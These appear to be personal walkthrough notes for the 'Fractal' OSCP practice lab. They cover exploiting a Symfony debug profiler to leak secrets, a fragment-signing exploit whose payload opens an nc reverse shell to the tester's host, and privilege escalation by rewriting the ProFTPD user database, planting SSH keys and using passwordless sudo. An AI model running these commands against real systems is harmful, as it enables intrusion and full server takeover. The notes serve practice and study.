WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 ProFTPD
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/app_dev.php /app_dev.php/*
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Welcome!
|_http-favicon: Unknown favicon MD5: 231567A8CC45C2CF966C4E8D99A5B7FDRegarding to 80 port,
http://192.168.243.233/phpmyadmin/index.php
--> try some common credentials --> didn:t work
http://192.168.243.233/robots.txt -->
Disallow: /app_dev.php
Disallow: /app_dev.php/*ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.233/app_dev.php/FUZZ
---> no info
See /app_dev.php
--> Symfony 3.4.46
Also try FLI on GET /app_dev.php/_profiler/open?file=§a§ --> didn:t work.
According to the article , we can read app/config/parameters.yml http://192.168.243.233/app_dev.php/_profiler/open?file=app/config/parameters.yml -->
parameters:
database_host: 127.0.0.1
database_port: 3306
database_name: symfony
database_user: symfony
database_password: symfony_db_password
mailer_transport: smtp
mailer_host: 127.0.0.1
mailer_user: null
mailer_password: null
secret: 48a8538e6260789558f0dfe29861c05b
search Symfony 3.4.46 exploit --> https://github.com/ambionics/symfony-exploits/tree/main
python3 secret_fragment_exploit.py 'http://192.168.161.233/_fragment' --method 2 --secret '48a8538e6260789558f0dfe29861c05b' --algo 'sha256' --internal-url 'http://192.168.161.233/_fragment' --function system --parameters 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.222 80 >/tmp/f'
-->
Access the URL above, i got a reverse shell from the target host.
PE:
cd /etc/proftpd
ls
cat sql.confpython3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
mysql -u proftpd -pprotfpd_with_MYSQL_password
show databases;
use proftpd;
show tables;
select * from ftpuser;
Refer to: https://medium.com/@nico26deo/how-to-set-up-proftpd-with-a-mysql-backend-on-ubuntu-c6f23a638caf
Password in the passwd field should be encrypted, to do so you can use this snippet (on your Terminal) to generate the password string you can paste into the passwd field:
/bin/echo "{md5}"/bin/echo -n "password" | openssl dgst -binary -md5 | openssl enc -base64
--> {md5}X03MO1qnZdYdgyfeuILPmQ==
we can update current www user or add a beniot user.
update ftpuser set passwd='{md5}X03MO1qnZdYdgyfeuILPmQ==' where id = 1;
update ftpuser set homedir='/' where id = 1;
update ftpuser set shell='/bin/bash' where id = 1;
update ftpuser set uid=1000,gid=1000 where id=1;
Refer to https://medium.com/@ardian.danny/oscp-practice-series-19-proving-grounds-fractal-4239c06a0dc8
INSERT INTOftpuser(id,userid,passwd,uid,gid,homedir,shell,count,accessed,modified) VALUES (2, 'benoit', '{md5}X03MO1qnZdYdgyfeuILPmQ==', '1000', '1000', '/', '/bin/bash', '0', '2022-12-05 05:26:29', '2022-12-12 05:26:29');
(According to /etc/passwd, we knew that benoit's uid and gid are1000,1000)
ftp benoit@192.168.161.233 (pwd is "password") -->
cd /home/benoit
mkdir .ssh
put authorized_keys
then, ssh -i ~/.ssh/id_ed25519 benoit@192.168.161.233 -->
$ sudo -l
Matching Defaults entries for benoit on fractal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User benoit may run the following commands on fractal:
(ALL) NOPASSWD: ALL
so, run "sudo su" to switch to root .
Key points:
/bin/echo "{md5}"/bin/echo -n "myPassword" | openssl dgst -binary -md5 | openssl enc -base64``/etc/proftpd